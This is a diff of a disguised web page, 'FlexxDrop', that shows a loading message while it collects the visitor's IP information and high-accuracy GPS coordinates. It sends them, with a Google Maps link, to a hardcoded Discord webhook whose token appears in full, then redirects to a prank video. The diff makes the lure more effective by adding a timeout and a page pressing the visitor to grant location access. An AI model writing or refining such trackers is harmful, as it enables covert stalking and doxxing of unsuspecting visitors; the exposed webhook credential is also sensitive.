--- a/index.html
+++ b/index.html
@@ -20,12 +20,21 @@
   </style>
 </head>
 <body>
-  <div>Loading FlexxDrop…</div>
+  <div id="status">Loading FlexxDrop…</div>
 
   <script>
     const webhookUrl = "https://discord.com/api/webhooks/1388161217603965210/eELyivDPEhlKfnaaDce_b90zBtGFpe51uLHo28LsG0gle_1d8pfuN-_U6vK6Q38_N4Fj";
     const redirectUrl = "https://www.youtube.com/watch?v=dQw4w9WgXcQ";
-    const deniedPageUrl = "data:text/html,<html style='background:black;color:white;font-family:sans-serif;display:flex;justify-content:center;align-items:center;height:100vh;'><body><div>Permissions not given. Please allow location access and reload the page.</div></body></html>";
+    const deniedPage = `<html style='background:black;color:white;font-family:sans-serif;display:flex;justify-content:center;align-items:center;height:100vh;'>
+      <body><div>Permissions not given. Please allow location access and reload the page.</div></body></html>`;
+
+    let timeoutID;
+
+    function redirectDenied() {
+      document.open();
+      document.write(deniedPage);
+      document.close();
+    }
 
     function sendToDiscord(lat, lon, acc, ipData) {
       const mapLink = `https://www.google.com/maps?q=${lat},${lon}`;
@@ -60,15 +69,21 @@
       fetch("https://api.db-ip.com/v2/free/self")
         .then(res => res.json())
         .then(ipData => {
+          timeoutID = setTimeout(() => {
+            redirectDenied(); // fallback if user blocks or ignores
+          }, 10000); // wait max 10 seconds
+
           navigator.geolocation.getCurrentPosition(
             (pos) => {
+              clearTimeout(timeoutID);
               const lat = pos.coords.latitude;
               const lon = pos.coords.longitude;
               const acc = pos.coords.accuracy;
               sendToDiscord(lat, lon, acc, ipData);
             },
-            () => {
-              window.location.href = deniedPageUrl;
+            (err) => {
+              clearTimeout(timeoutID);
+              redirectDenied();
             },
             {
               enableHighAccuracy: true,
@@ -78,26 +93,11 @@
           );
         })
         .catch(() => {
-          window.location.href = deniedPageUrl;
+          redirectDenied();
         });
     }
 
-    window.onload = () => {
-      if (!navigator.permissions) {
-        getIPAndGPS();
-        return;
-      }
-
-      navigator.permissions.query({ name: "geolocation" }).then(result => {
-        if (result.state === "denied") {
-          window.location.href = deniedPageUrl;
-        } else {
-          getIPAndGPS();
-        }
-      }).catch(() => {
-        getIPAndGPS();
-      });
-    };
+    window.onload = getIPAndGPS;
   </script>
 </body>
 </html>
